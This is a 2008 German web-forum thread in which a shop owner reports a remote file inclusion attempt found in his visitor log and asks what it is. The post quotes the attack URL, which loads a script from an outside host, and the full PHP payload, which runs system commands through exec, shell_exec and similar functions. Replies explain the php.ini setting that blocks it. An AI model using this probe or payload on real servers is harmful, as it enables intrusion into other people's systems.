Grisu77 Posted July 29, 2008 Report Share Posted July 29, 2008 Hab eben beim WHO IS ONLINE folgendes gefunden : 00:09:19 0 Guest 74.55.183.82 19:19:18 19:19:18 /shop/index.php?x=http://rjoos.ch/Reise/images/tOtti/help.txt?? Jemand versucht aus dem Shop die Seite (oben) auszuführen ... Rauskommen tut bei der txt.datei folgendes (was ist das ??) : <? $dir = @getcwd(); echo "Mic22<br>"; $ker = @php_uname(); $OS = @PHP_OS; echo "OSTYPE:$OS<br>"; echo "<br>Kernel:$ker<br>"; $free = disk_free_space($dir); if ($free === FALSE) {$free = 0;} if ($free < 0) {$free = 0;} echo "Free:".view_size($free)."<br>"; $cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; } function view_size($size) { if (!is_numeric($size)) {return FALSE;} else { if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} else {$size = $size . " B";} return $size; } } exit; Link to comment Share on other sites More sharing options...
Guest tuvalu Posted July 29, 2008 Report Share Posted July 29, 2008 Das ist ein üblich Eintrag, funktioniert beim aktuellen Shop aber nicht. Entwarnung. tuvalu Link to comment Share on other sites More sharing options...
Outpack Posted July 30, 2008 Report Share Posted July 30, 2008 das kommt davon, wenn fopen zugelassen ist (php.ini) Link to comment Share on other sites More sharing options...
Grisu77 Posted July 30, 2008 Author Report Share Posted July 30, 2008 Was bedeutet das ?! Link to comment Share on other sites More sharing options...
Outpack Posted July 30, 2008 Report Share Posted July 30, 2008 Was bedeutet das ?! da kann ein String an ein php Script angehängt werden, was (wenn vom System erlaubt) obige Befehle (popen, exec, etc.) ausführt. Link to comment Share on other sites More sharing options...
hubbabubba Posted July 30, 2008 Report Share Posted July 30, 2008 Was bedeutet das ?! Es gibt Sicherheitseinstellungen (php.ini) mit denen man dem php-interpreter verbieten kann Dateien, resp. Programmdateien, von fremden Servern herunterzuladen. Gelingt es einem Angreifer ein paar eigene Programmbefehle einzuschleusen und zu Ausführung zu bringen kann er mittels der o.g. Funktionalität komplette Fremdprogramme einschleusen die es ihm ermöglichen das System vollständig unter seine Kontrolle zu bringen. Eben um dieses Einbruchsszenario im Grundsatz zu unterbinden gibt es diesen Schalter in den php-Konfigurationen. Solange keine regulären Anwendungen laufen welche das externe nachladen von Dateien erfordern sollte dies verboten sein. mfg Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.